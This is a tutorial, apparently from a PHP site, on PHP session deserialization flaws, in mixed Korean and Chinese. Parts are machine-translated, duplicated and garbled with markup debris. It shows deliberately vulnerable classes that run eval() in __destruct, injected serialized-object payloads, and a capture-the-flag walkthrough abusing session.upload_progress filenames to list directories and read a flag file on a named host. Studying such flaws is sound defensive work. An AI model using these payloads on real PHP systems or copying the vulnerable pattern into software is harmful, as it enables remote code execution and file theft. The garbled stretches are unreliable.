이 기사는 PHP에 대한 관련 지식을 제공합니다. 이는 주로 세션 역직렬화 취약점, 즉 세션 데이터를 직렬화 및 저장하는 다양한 방법과 세션 역직렬화 취약점으로 이어지는 세션 데이터를 역직렬화하고 읽는 다양한 방법을 소개합니다. 이것이 도움이 되기를 바랍니다. 모든 사람.
추천 연구: "PHP 비디오 튜토리얼"
PHP 세션
역직렬화 취약점은 [직렬화된 저장소 세션
데이터]인 경우입니다. 및 [역직렬화와 세션
데이터 읽기]가 다르기 때문에 세션
역직렬화 취약점이 발생합니다session
反序列化漏洞,就是当【序列化存储Session
数据】与【反序列化读取Session
数据】的方式不同导致session
反序列化漏洞的产生
官方Session
定义:在计算机中,尤其是在网络应用中,称为“会话控制”。Session
对象存储特定用户会话所需的属性及配置信息。主要有以下特点:
session
保存的位置是在服务器端session
通常是要配合cookie
使用因为HTTP的无状态性,服务端产生了session
来标识当前的用户状态
本质上,session
就是一种可以维持服务器端的数据存储技术。即**session
技术就是一种基于后端有别于数据库的临时存储数据的技术**
以PHP为例,理解session
的原理
session
会话,会自动检测PHPSESSID
Cookie
中存在,获取PHPSESSID
Cookie
中不存在,创建一个PHPSESSID
,并通过响应头以Cookie
形式保存到浏览器$_SESSION
为一个空数组PHPSESSID
去指定位置(PHPSESSID
文件存储位置)匹配对应的文件$_SESSION
中PHPSESSID
命名文件$_SESSION
中保存的所有数据序列化存储到PHPSESSID
对应的文件中具体原理图:
php.ini
里面有较重要的session
配置项
session.save_path="/tmp" --设置session文件的存储位置 session.save_handler=files --设定用户自定义存储函数,如果想使用PHP内置session存储机制之外的可以使用这个函数 session.auto_start= 0 --指定会话模块是否在请求开始时启动一个会话,默认值为 0,不启动 session.serialize_handler= php --定义用来序列化/反序列化的处理器名字,默认使用php session.upload_progress.enabled= On --启用上传进度跟踪,并填充$ _SESSION变量,默认启用 session.upload_progress.cleanup= oN --读取所有POST数据(即完成上传)后立即清理进度信息,默认启用
根据php.ini
中的配置项,我们研究将$_SESSION
中保存的所有数据序列化存储到PHPSESSID
对应的文件中,使用的三种不同的处理格式,即session.serialize_handler
定义的三种引擎:
处理器 | 对应的存储格式 |
---|---|
php | 键名 + 竖线 + 经过 serialize() 函数反序列处理的值 |
php_binary | 键名的长度对应的 ASCII 字符 + 键名 + 经过 serialize() 函数反序列处理的值 |
php_serialize (php>=5.5.4) | 经过 serialize() 函数反序列处理的数组 |
首先来看看默认session.serialize_handler = php
时候的序列化结果,代码如下
<?php//ini_set('session.serialize_handler','php');session_start();$_SESSION['name'] = $_GET['name'];echo $_SESSION['name'];?>
为了方便查看,将session
存储目录设置为session.save_path = "/www/php_session"
,PHPSESSID
文件如下
1、文件名
文件名为sess_mpnnbont606f50eb178na451od
,其中mpnnbont606f50eb178na451od
就是后续请求头中Cookie
携带的PHPSESSID
공식세션
정의: 컴퓨터, 특히 네트워크 응용프로그램에서는 이를 "세션 제어"라고 합니다. 세션
개체는 특정 사용자 세션에 필요한 속성 및 구성 정보를 저장합니다. 주요 기능은 다음과 같습니다.
세션
은 서버측에 저장됩니다.세션
은 일반적으로 쿠키
와 함께 사용됩니다. >
세션
을 생성합니다PHP 세션 워크플로우 | 를 이해하려면 PHP를 예로 들어보겠습니다. 세션 코드의 원리> |
PHP 스크립트가 session_start()를 사용하여 세션 세션을 열면 자동으로 PHPSESSID 를 감지합니다.
|
---|---|---|
파일이 존재합니다: 파일을 읽습니다. 콘텐츠(역직렬화 방법을 통해), 데이터를 | 파일이 존재하지 않습니다: session_start()는 PHPSESSID 라는 이름의 파일을 생성합니다 | 프로그램 실행이 끝나면 특정 회로도: |
php.ini
에는 php에 따라 더 중요한 <code>세션
구성 항목🎜<?phpini_set('session.serialize_handler','php_binary');session_start();# 为了方便ACSII显示,将键名设置为36个字符长度$_SESSION['namenamenamenamenamenamenamenamename'] = $_GET['name'];echo $_SESSION['namenamenamenamenamenamenamenamename'];?>🎜PHP 세션 직렬화 메커니즘🎜🎜이 포함되어 있습니다. .inicode>의 구성 항목에 대해
$_SESSION
에 저장된 모든 데이터를 PHPSESSID
에 해당하는 파일에 직렬화하고 저장하는 데 사용되는 세 가지 처리 형식을 연구합니다. 즉, session.serialize_handler
에 의해 정의된 세 가지 엔진: 🎜🎜🎜🎜session.serialize_handler = php
일 때의 시퀀스를 살펴보겠습니다. > 결과적으로 코드는 다음과 같습니다🎜<?phpini_set('session.serialize_handler','php_serialize');session_start();$_SESSION['name'] = $_GET['name'];echo $_SESSION['name'];?>🎜🎜 🎜쉽게 보려면
session
저장 디렉터리를 session.save_path = "/www/php_session"
으로 설정하세요. PHPSESSID
파일은 다음과 같습니다. 🎜🎜🎜🎜1.파일 이름sess_mpnnbont606f50eb178na451od, 여기서 mpnnbont606f50eb178na451od
는 브라우저에 저장된 후속 요청 헤더의 Cookie
에 의해 전달되는 PHPSESSID
의 값입니다. 위) 🎜🎜2. 파일 콘텐츠 🎜🎜php 프로세서 저장 형식🎜🎜🎜🎜🎜키 이름🎜🎜세로 막대🎜🎜serialize() 함수에 의해 역직렬화된 값🎜🎜🎜🎜🎜🎜$_SESSION['name'] 키 이름: name🎜🎜 |🎜🎜s:6:"강화";🎜🎜🎜🎜使用php_binary处理器,即session.serialize_handler = php_binary
<?phpini_set('session.serialize_handler','php_binary');session_start();# 为了方便ACSII显示,将键名设置为36个字符长度$_SESSION['namenamenamenamenamenamenamenamename'] = $_GET['name'];echo $_SESSION['namenamenamenamenamenamenamenamename'];?>
由于三种方式PHPSESSID
文件名都是一样的,这里只需要查看文件内容
键名的长度对应的 ASCII 字符 | 键名 | 经过 serialize() 函数反序列处理的值. |
---|---|---|
$ | namenamenamenamenamenamenamenamename | s:6:“harden”; |
使用php_binary处理器,即session.serialize_handler = php_serialize
<?phpini_set('session.serialize_handler','php_serialize');session_start();$_SESSION['name'] = $_GET['name'];echo $_SESSION['name'];?>
文件内容即经过 serialize() 函数反序列处理的数组,a:1:{s:4:"name";s:6:"harden";}
session的反序列化漏洞,就是利用php
处理器和php_serialize
处理器的存储格式差异而产生,通过具体的代码我们来看下漏洞出现的原因
首先创建session.php
,使用php_serialize
处理器来存储session数据
<?phpini_set('session.serialize_handler','php_serialize');session_start();$_SESSION['session'] = $_GET['session'];echo $_SESSION['session'];?>
test.php
,使用默认php
处理器来存储session数据
<?phpsession_start();class f4ke{ public $name; function __wakeup(){ echo "Who are you?"; } function __destruct(){ eval($this->name); }}$str = new f4ke();?>
接着,我们构建URL进行访问session.php
:
http://www.session-serialize.com/session.php?session=|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}
打开PHPSESSID
文件可看到序列化存储的内容
a:1:{s:7:"session";s:45:"|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}
漏洞分析:
在
session.php
程序执行,我们将|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}
通过php_serialize
处理器序列化保存成PHPSESSID
文件;由于浏览器中保存的
PHPSESSID
文件名不变,当我们访问test.php
,session_start();
找到PHPSESSID
文件并使用php
处理器反序列化文件内容,识别格式即
键名 竖线 经过 serialize() 函数反序列处理的值 a:1:{s:7:“session”;s:45:" | O:4:“f4ke”:1:{s:4:“name”;s:10:“phpinfo();”;} php处理器会以|作为分隔符,将
O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}
反序列化,就会触发__wakeup()
方法,最后对象销毁执行__destruct()
方法中的eval()
函数,相当于执行如下:$_SESSION['session'] = new f4ke();$_SESSION['session']->name = 'phpinfo();';
我们访问test.php
,即可直接执行phpinfo()
函数
<?php//A webshell is wait for youini_set('session.serialize_handler', 'php');session_start();class OowoO{ public $mdzz; function __construct() { $this->mdzz = 'phpinfo();'; } function __destruct() { eval($this->mdzz); }}if(isset($_GET['phpinfo'])){ $m = new OowoO();}else{ highlight_string(file_get_contents('index.php'));}?>
我们可以看到ini_set('session.serialize_handler', 'php')
,判断可能存在session反序列化漏洞,根据代码逻辑,访问URL加上phpinfo
参数新建对象触发魔术方法执行phpinfo()
函数,进一步查看session.serialize_handler
配置
可见php.ini
中session.serialize_handler = php_serialize
,当前目录中被设置为session.serialize_handler = php
,因此存在session反序列化利用的条件
补充知识
phpinfo文件中
local value(局部变量:作用于当前目录程序,会覆盖master value内容):php master value(主变量:php.ini里面的内容):php_serialize
那么我们如何找到代码入口将利用代码写入到session
文件?想要写入session
文件就得想办法在$_SESSION
变量中增加我们可控的输入点
补充知识
当检测Session 上传进度这一特性是开启状态,我们可以在客户端写一个文件上传的功能,文件上传的同时,POST
一个与php.ini
中设置的session.upload_progress.name
同名变量PHP_SESSION_UPLOAD_PROGRESS
,如下图,即可写入$_SESSION
,进一步序列化写入session
文件
下面是官方给出的一个文件上传时监测进度例子:
<form action="upload.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="<?php echo ini_get("session.upload_progress.name"); ?>" value="123" /> <input type="file" name="file1" /> <input type="file" name="file2" /> <input type="submit" /></form>
其中name=""
也可以设置为name="PHP_SESSION_UPLOAD_PROGRESS"
在session中存储的上传进度,如下所示:
<?php$_SESSION["upload_progress_123"] = array( "start_time" => 1234567890, // The request time 请求时间 "content_length" => 57343257, // POST content length 长度 "bytes_processed" => 453489, // Amount of bytes received and processed 已接收字节 "done" => false, // true when the POST handler has finished, successfully or not 是否上传完成 "files" => array(//上传的文件 0 => array( "field_name" => "file1", // Name of the <input/> field input中设定的变量名 // The following 3 elements equals those in $_FILES "name" => "foo.avi", //文件名 "tmp_name" => "/tmp/phpxxxxxx", "error" => 0, "done" => true, // True when the POST handler has finished handling this file "start_time" => 1234567890, // When this file has started to be processed "bytes_processed" => 57343250, // Amount of bytes received and processed for this file ), // An other file, not finished uploading, in the same request 1 => array( "field_name" => "file2", "name" => "bar.avi", "tmp_name" => NULL, "error" => 0, "done" => false, "start_time" => 1234567899, "bytes_processed" => 54554, ), ));
其中,session中的field_name
和name
都是我们可控的输入点!
下面我们就开始解题拿到flag
首先,http://web.jarvisoj.com:32784/index.php?phpinfo
查询设置
session.upload_progress.enabled = On --表明允许上传进度跟踪,并填充$ _SESSION变量 session.upload_progress.cleanup = Off --表明所有POST数据(即完成上传)后,不清理进度信息($ _SESSION变量)
即允许上传进度跟踪且结束后不清除数据,更有利使用session.upload_progress.name
来将利用代码写入session
文件
构造POST
表单提交上传文件
<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" /> <input type="file" name="file" /> <input type="submit" /></form>
构造序列化字符串作为payload
(利用代码)
<?phpclass OowoO{ public $mdzz='print_r(scandir(dirname(__FILE__)));';}$obj = new OowoO();echo serialize($obj);?>//O:5:"OowoO":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}
为了防止"
被转义,我们在payload
中加入\
随意选择文件,点击表单提交,使用抓包工具burpsuite
抓取请求包
并修改filename
值为
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}
发送请求包,代码执行过程分析:
因此直接执行print_r(scandir(dirname(__FILE__)));
并返回
phpinfo
查看当前目录,/opt/lampp/htdocs/
构造最终payload
读取Here_1s_7he_fl4g_buT_You_Cannot_see.php
文件内容,即flag
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}
推荐学习:《PHP视频教程》
위 내용은 PHP의 세션 역직렬화 취약점에 대한 자세한 소개의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!